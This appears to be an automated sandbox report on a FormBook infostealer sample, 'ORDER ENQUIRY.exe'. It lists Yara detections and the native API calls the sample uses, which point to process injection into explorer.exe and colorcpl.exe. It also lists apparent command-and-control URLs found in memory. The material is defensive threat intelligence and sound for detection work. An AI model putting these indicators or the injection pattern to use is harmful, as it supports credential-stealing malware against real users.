Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.horxncnt.xyzReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.manhuafeifei.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.manhuafeifei.xyz/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.manhuafeifei.xyz/hy08/www.horxncnt.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.manhuafeifei.xyzReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mksport-app.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mksport-app.com/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mksport-app.com/hy08/www.raidsa.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mksport-app.comReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.os9user.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.os9user.com/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.os9user.com/hy08/www.mksport-app.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.os9user.comReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.raidsa.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.raidsa.xyz/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.raidsa.xyz/hy08/www.manhuafeifei.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.raidsa.xyzReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.valo.games
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.valo.games/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.valo.games/hy08/www.bodgion.xyz
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.valo.gamesReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wergol.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wergol.com/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wergol.com/hy08/www.os9user.com
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wergol.comReferer:
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yc23w.top
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yc23w.top/hy08/
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yc23w.top/hy08/www.hemcksqa.net
Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yc23w.topReferer:
Source: explorer.exe, 00000004.00000002.4560565201.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2117240871.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000004.00000000.2111653112.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000004.00000002.4556219779.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000004.00000000.2111653112.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4553917152.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000004.00000000.2100807606.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3880999579.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3096442622.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000004.00000002.4557463098.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100493467.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://flywatchsecurity.com/hy08?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL
Source: explorer.exe, 00000004.00000003.3100033957.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4557514681.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000004.00000000.2117240871.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4560565201.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon
Source: explorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: explorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4564943648.00000000106AF000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: ORDER ENQUIRY.exe PID: 3032, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: ORDER ENQUIRY.exe PID: 4564, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 3944, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: ORDER ENQUIRY.exe

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041A350 NtCreateFile,	3_2_0041A350
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041A400 NtReadFile,	3_2_0041A400
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041A480 NtClose,	3_2_0041A480
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041A530 NtAllocateVirtualMemory,	3_2_0041A530
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041A34A NtCreateFile,	3_2_0041A34A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041A3FC NtReadFile,	3_2_0041A3FC
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041A47A NtClose,	3_2_0041A47A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041A52A NtAllocateVirtualMemory,	3_2_0041A52A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_01AF2BF0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2B60 NtClose,LdrInitializeThunk,	3_2_01AF2B60
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2AD0 NtReadFile,LdrInitializeThunk,	3_2_01AF2AD0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01AF2DF0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2DD0 NtDelayExecution,LdrInitializeThunk,	3_2_01AF2DD0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2D30 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_01AF2D30
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2D10 NtMapViewOfSection,LdrInitializeThunk,	3_2_01AF2D10
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2CA0 NtQueryInformationToken,LdrInitializeThunk,	3_2_01AF2CA0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_01AF2C70
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2FB0 NtResumeThread,LdrInitializeThunk,	3_2_01AF2FB0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2F90 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_01AF2F90
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2FE0 NtCreateFile,LdrInitializeThunk,	3_2_01AF2FE0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2F30 NtCreateSection,LdrInitializeThunk,	3_2_01AF2F30
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_01AF2EA0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2E80 NtReadVirtualMemory,LdrInitializeThunk,	3_2_01AF2E80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF4340 NtSetContextThread,	3_2_01AF4340
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF4650 NtSuspendThread,	3_2_01AF4650
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2BA0 NtEnumerateValueKey,	3_2_01AF2BA0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2B80 NtQueryInformationFile,	3_2_01AF2B80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2BE0 NtQueryValueKey,	3_2_01AF2BE0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2AB0 NtWaitForSingleObject,	3_2_01AF2AB0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2AF0 NtWriteFile,	3_2_01AF2AF0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2DB0 NtEnumerateKey,	3_2_01AF2DB0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2D00 NtSetInformationFile,	3_2_01AF2D00
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2CF0 NtOpenProcess,	3_2_01AF2CF0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2CC0 NtQueryVirtualMemory,	3_2_01AF2CC0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2C00 NtQueryInformationProcess,	3_2_01AF2C00
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2C60 NtCreateKey,	3_2_01AF2C60
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2FA0 NtQuerySection,	3_2_01AF2FA0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2F60 NtCreateProcessEx,	3_2_01AF2F60
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2EE0 NtQueueApcThread,	3_2_01AF2EE0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2E30 NtWriteVirtualMemory,	3_2_01AF2E30
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF3090 NtSetValueKey,	3_2_01AF3090
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF3010 NtOpenDirectoryObject,	3_2_01AF3010
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF35C0 NtCreateMutant,	3_2_01AF35C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF39B0 NtGetContextThread,	3_2_01AF39B0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF3D10 NtOpenProcessToken,	3_2_01AF3D10
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF3D70 NtOpenThread,	3_2_01AF3D70
Source: C:\Windows\explorer.exe	Code function: 4_2_10697232 NtCreateFile,	4_2_10697232
Source: C:\Windows\explorer.exe	Code function: 4_2_10698E12 NtProtectVirtualMemory,	4_2_10698E12
Source: C:\Windows\explorer.exe	Code function: 4_2_10698E0A NtProtectVirtualMemory,	4_2_10698E0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_048D2CA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2C60 NtCreateKey,LdrInitializeThunk,	5_2_048D2C60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_048D2C70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2DD0 NtDelayExecution,LdrInitializeThunk,	5_2_048D2DD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_048D2DF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_048D2D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_048D2EA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2FE0 NtCreateFile,LdrInitializeThunk,	5_2_048D2FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2F30 NtCreateSection,LdrInitializeThunk,	5_2_048D2F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2AD0 NtReadFile,LdrInitializeThunk,	5_2_048D2AD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_048D2BE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_048D2BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2B60 NtClose,LdrInitializeThunk,	5_2_048D2B60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D35C0 NtCreateMutant,LdrInitializeThunk,	5_2_048D35C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D4650 NtSuspendThread,	5_2_048D4650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D4340 NtSetContextThread,	5_2_048D4340
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2CC0 NtQueryVirtualMemory,	5_2_048D2CC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2CF0 NtOpenProcess,	5_2_048D2CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2C00 NtQueryInformationProcess,	5_2_048D2C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2DB0 NtEnumerateKey,	5_2_048D2DB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2D00 NtSetInformationFile,	5_2_048D2D00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2D30 NtUnmapViewOfSection,	5_2_048D2D30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2E80 NtReadVirtualMemory,	5_2_048D2E80
